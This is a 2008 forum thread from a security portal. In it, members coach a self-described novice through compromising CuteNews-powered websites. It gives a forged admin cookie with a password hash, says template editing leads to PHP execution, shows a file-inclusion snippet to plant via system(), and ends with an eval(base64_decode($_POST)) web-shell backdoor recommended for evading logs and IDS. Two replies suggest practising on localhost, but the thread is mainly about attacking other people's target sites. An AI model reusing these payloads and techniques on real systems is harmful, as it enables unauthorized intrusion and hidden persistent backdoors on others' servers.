 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
Cutenews php shell |
 |
 Posted: Thu Feb 21, 2008 6:18 pm |
 |
|
| ScrepY |
| Regular user |
 |
|
| Joined: Feb 20, 2008 |
| Posts: 5 |
|
|
|
 |
|
 |
|
| waraxe wrote: | | Elewyn wrote: | | Can explain how to craft a cutenews cookie? |
Cookie must be like this:
| Code: |
username=admin;md5_password=1b3396f4609f652f7179bd05423c5374;
|
Use Firefox and cookie editor add-on and create new cookie with username and password hash, as seen above, and with domain pointing to target website. That's all 
And by the way - when you have cutenews admin privileges, then it's easy to get php level acess - through template editing. And if safe_mode=off, then next step can be exec(), popen(), system() and/or other shell access functions in php
Basically - most of the cutenews-powered websites are just waiting for troubles ... |
I want to ask how to to this :
And by the way - when you have cutenews admin privileges, then it's easy to get php level acess - through template editing. And if safe_mode=off, then next step can be exec(), popen(), system() and/or other shell access functions in php
How to do this i am noob so help would be great ! I mean show the right way some links .. Thank you ! |
|
|
|
|
|
|
|
|
| Posted: Thu Feb 21, 2008 6:32 pm |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| What status you have right now? Can you log in as Cutenews admin? Can you see template edit option in admin menu? |
|
|
|
|
| Posted: Thu Feb 21, 2008 6:35 pm |
|
|
| ScrepY |
| Regular user |
|
|
| Joined: Feb 20, 2008 |
| Posts: 5 |
|
|
|
|
|
|
|
| Yes i am in . I managed to edit cokies just i dont know what i have to change in the template code i tired but then shows some errors . |
|
|
|
|
| Posted: Thu Feb 21, 2008 6:44 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
|
|
|
|
| Posted: Thu Feb 21, 2008 6:49 pm |
|
|
| ScrepY |
| Regular user |
|
|
| Joined: Feb 20, 2008 |
| Posts: 5 |
|
|
|
|
|
|
|
Ok thank you  |
|
|
|
|
| Posted: Thu Feb 21, 2008 7:53 pm |
|
|
| ScrepY |
| Regular user |
|
|
| Joined: Feb 20, 2008 |
| Posts: 5 |
|
|
|
|
|
|
|
 ok next thing where i can find what i can do ... i doing this first time so its hard. please get me on the way |
|
|
|
|
| Posted: Fri Feb 22, 2008 12:29 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| ScrepY wrote: | | ok next thing where i can find what i can do ... i doing this first time so its hard. please get me on the way |
Install CuteNews on your home PC and try all attacks against localhost. Experience comes through trial/error ... |
|
|
|
|
| Posted: Fri Feb 22, 2008 2:08 pm |
|
|
| ScrepY |
| Regular user |
|
|
| Joined: Feb 20, 2008 |
| Posts: 5 |
|
|
|
|
|
|
|
OK as i understand i need to insert this code in to a web
| Code: | <?php
$page = $_GET['page'];
if (isset($page))
{
include($page);
}
?> |
I want to insert it in the file example1.php
Then i could use shell ...
Do i think good ?
Now the questions i know how to add a simple text in the file:
| Code: | | system("echo ^<center^> blah blah blah ^</center^> > example1.php") |
But i dont know how to add this code using the system :
| Code: | <?php
$page = $_GET['page'];
if (isset($page))
{
include($page);
}
?> |
|
|
|
|
|
| Posted: Fri Feb 22, 2008 3:20 pm |
|
|
| pexli |
| Valuable expert |
 |
|
| Joined: May 24, 2007 |
| Posts: 665 |
| Location: Bulgaria |
|
|
|
|
|
|
| You know what is Linux,UNIX command,error_log,GET method,POST method.Do as say waraxe.Install cutenews local and test,don't do this on real server. |
|
|
|
|
| Posted: Fri Feb 22, 2008 3:31 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
Here is little piece of php code:
| Code: |
@eval(base64_decode($_POST['e']));
|
If you inject this code to CuteNews template, then you can use POST method (no revealing apache logs), base64 encoding (no IDS/IPS triggering and filters). You can after that execute ANY php code on remote server - ANY!! Just what you need is little php script in your local PC, or even just one simple html file with POST form + online base64 encoder. No C99 or other $h|t ... |
|
|
|
|
|
|
|
|
| Posted: Fri Feb 22, 2008 8:31 pm |
|
|
| pexli |
| Valuable expert |
|
|
| Joined: May 24, 2007 |
| Posts: 665 |
| Location: Bulgaria |
|
|
|
|
|
|
| waraxe wrote: | Here is little piece of php code:
| Code: |
@eval(base64_decode($_POST['e']));
|
If you inject this code to CuteNews template, then you can use POST method (no revealing apache logs), base64 encoding (no IDS/IPS triggering and filters). You can after that execute ANY php code on remote server - ANY!! Just what you need is little php script in your local PC, or even just one simple html file with POST form + online base64 encoder. No C99 or other $h|t ... |
I love you dude  |
|
|
|
|
www.waraxe.us Forum Index -> Newbies corner
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 73
Members: 0
Total: 73
